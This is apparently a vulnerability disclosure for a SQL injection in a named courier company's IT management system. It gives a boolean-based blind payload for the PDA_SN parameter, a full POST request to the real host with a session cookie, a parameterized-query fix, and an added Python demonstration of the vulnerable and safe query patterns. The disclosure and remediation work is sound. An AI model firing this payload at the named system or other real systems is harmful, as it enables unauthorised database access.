SQL injection vulnerability in express IT Management System
Place: POST
Parameter: PDA_SN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PDA_Type=&PDA_SN=X30013040448' AND 1496=1496 AND 'MmCo'='MmCo&pager.pageNo=1&pager.pageSize=20&sort=USE_SITE&direction=desc
POST /BaQiangWangDian/getBaQiangOfPager HTTP/1.1
Host: it.zt-express.com
Proxy-Connection: keep-alive
Content-Length: 91
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://it.zt-express.com
X-Requested-With: XMLHttpRequest
User-Agent:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://it.zt-express.com/Views/BaQiang/BaQiangWangDian.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=o0rlyixrhhpc4z1q5cbjgu1b

PDA_Type=&PDA_SN=X30013040448&pager.pageNo=1&pager.pageSize=20&sort=USE_SITE&direction=desc
Injection parameter: PDA_SN
Data extraction is slow (boolean-based blind injection).
Solution:
Filter the PDA_SN input server-side and use parameterized SQL queries instead of string concatenation.
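The following is an added example, not code from the report or from the affected ASP.NET application: it models the vulnerable query pattern behind the PDA_SN parameter and the parameterized fix, using a constructed in-memory SQLite table (the table and column names, the second "false" probe and the sort allowlist are assumptions).

```python
import sqlite3

# Constructed in-memory stand-in for the PDA table behind getBaQiangOfPager
# (the real app is ASP.NET; this models only the query pattern).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pda (pda_sn TEXT, pda_type TEXT, use_site TEXT)")
    conn.executemany("INSERT INTO pda VALUES (?, ?, ?)", [
        ("X30013040448", "handheld", "site-A"),
        ("X30013040449", "handheld", "site-B"),
    ])
    return conn

def vulnerable_lookup(conn, pda_sn):
    # Vulnerable pattern: PDA_SN is concatenated into the SQL text, so a quote
    # in the value ends the literal and the remainder is parsed as SQL.
    sql = "SELECT pda_sn FROM pda WHERE pda_sn = '" + pda_sn + "'"
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn, pda_sn):
    # Hardened pattern: the value is bound as a parameter and never parsed as SQL.
    rows = conn.execute("SELECT pda_sn FROM pda WHERE pda_sn = ?", (pda_sn,))
    return [row[0] for row in rows]

# ORDER BY columns cannot be bound, so the request's sort/direction fields
# must be checked against an allowlist (assumed column mapping).
SORT_COLUMNS = {"USE_SITE": "use_site", "PDA_SN": "pda_sn"}

def safe_sorted_lookup(conn, pda_type, sort, direction):
    if sort not in SORT_COLUMNS or direction.lower() not in ("asc", "desc"):
        raise ValueError("rejected sort parameter")
    sql = (f"SELECT pda_sn FROM pda WHERE pda_type = ? "
           f"ORDER BY {SORT_COLUMNS[sort]} {direction.upper()}")
    return [row[0] for row in conn.execute(sql, (pda_type,))]

# The page's boolean-blind probe and a constructed "false" twin (1496=1497).
TRUE_PROBE = "X30013040448' AND 1496=1496 AND 'MmCo'='MmCo"
FALSE_PROBE = "X30013040448' AND 1496=1497 AND 'MmCo'='MmCo"

def demo():
    conn = make_db()
    return {
        "vuln_true": vulnerable_lookup(conn, TRUE_PROBE),    # row returned: probe ran as SQL
        "vuln_false": vulnerable_lookup(conn, FALSE_PROBE),  # empty: the blind oracle
        "safe_true": safe_lookup(conn, TRUE_PROBE),          # empty: whole string is one SN
        "safe_plain": safe_lookup(conn, "X30013040448"),     # normal lookup still works
        "sorted": safe_sorted_lookup(conn, "handheld", "USE_SITE", "desc"),
    }
```

The differing answers for the two probes under vulnerable_lookup are exactly the signal a boolean-based blind scanner relies on; under safe_lookup both probes return nothing.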